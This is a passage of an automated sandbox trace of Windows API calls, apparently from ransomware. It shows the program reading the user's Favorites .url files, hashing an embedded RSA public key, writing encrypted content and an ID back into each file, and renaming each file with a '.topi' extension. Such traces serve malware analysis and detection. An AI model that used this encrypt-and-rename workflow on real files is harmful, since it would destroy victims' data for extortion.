Size=0xeb) returned 0x9a03438 [0096.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0096.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0096.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49e8 [0096.586] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0096.586] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a60 [0096.586] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.586] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49b8 [0096.586] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0096.586] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.586] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0096.586] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a78 [0096.586] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.587] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a30 [0096.587] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.587] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0096.587] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.587] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0096.587] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.587] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0096.587] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49e8 | out: hHeap=0x680000) returned 1 [0096.587] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49e8 [0096.587] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.587] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0096.587] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.587] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0096.587] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.587] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0096.587] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0096.587] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0096.587] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.587] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0096.587] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49e8 | out: hHeap=0x680000) returned 1 [0096.587] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0096.587] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0096.587] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.587] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.587] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0096.587] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0096.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0096.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0096.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0096.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0096.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a78 | out: hHeap=0x680000) returned 1 [0096.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0096.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a60 | out: hHeap=0x680000) returned 1 [0096.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49b8 | out: hHeap=0x680000) returned 1 [0096.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0096.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0096.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0096.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a00 | out: hHeap=0x680000) returned 1 [0096.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a02a68 | out: hHeap=0x680000) returned 1 [0096.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0096.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0096.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0096.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0096.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0096.588] WriteFile (in: hFile=0x6a8, lpBuffer=0x31b3ff8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x31b3ff8*, lpNumberOfBytesWritten=0x9ccfb14*=0x80, lpOverlapped=0x0) returned 1 [0096.589] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3ff8 | out: hHeap=0x680000) returned 1 [0096.589] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.589] WriteFile (in: hFile=0x6a8, lpBuffer=0x99def60*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99def60*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0096.589] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0096.589] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0096.589] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0096.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0096.589] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0096.589] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.589] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0096.589] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0096.589] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.589] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0096.589] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0096.590] CloseHandle (hObject=0x6a8) returned 1 [0096.601] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ebb8 [0096.601] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0096.601] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ebb8 | out: hHeap=0x680000) returned 1 [0096.601] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.topi")) returned 1 [0096.601] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.601] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.601] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.603] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0096.603] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0096.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.603] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa6) returned 0x3152ab8 [0096.603] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.603] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned=".url" [0096.603] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.603] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=133) returned 1 [0096.603] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.607] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.607] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.608] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.608] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.608] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.608] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x85, lpOverlapped=0x0) returned 1 [0096.608] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.608] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0096.608] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.608] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.608] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0096.609] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.609] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.609] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.609] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.609] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.609] GetLastError () returned 0x0 [0096.609] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.609] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0096.609] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.609] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.609] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.609] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.609] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.609] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.610] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.610] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3ff8 [0096.610] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.610] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.610] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.610] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.610] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.610] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.610] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02a68 [0096.610] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a00 [0096.610] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02ab0 [0096.610] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49b8 [0096.610] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a60 [0096.610] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0096.610] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a78 [0096.610] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.610] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.610] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.610] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0096.610] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a60 | out: hHeap=0x680000) returned 1 [0096.610] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a78 | out: hHeap=0x680000) returned 1 [0096.610] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0096.610] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.610] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.610] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0096.610] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0096.610] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a78 [0096.610] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0096.610] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4a60 [0096.610] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0096.610] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.610] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.610] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.611] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.611] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.611] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.611] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.611] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.611] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a78 | out: hHeap=0x680000) returned 1 [0096.611] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.611] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a60 | out: hHeap=0x680000) returned 1 [0096.611] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.611] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.611] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0096.611] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.611] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.611] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.611] GetCurrentThreadId () returned 0x8c4 [0096.611] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.611] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f8220 [0096.611] 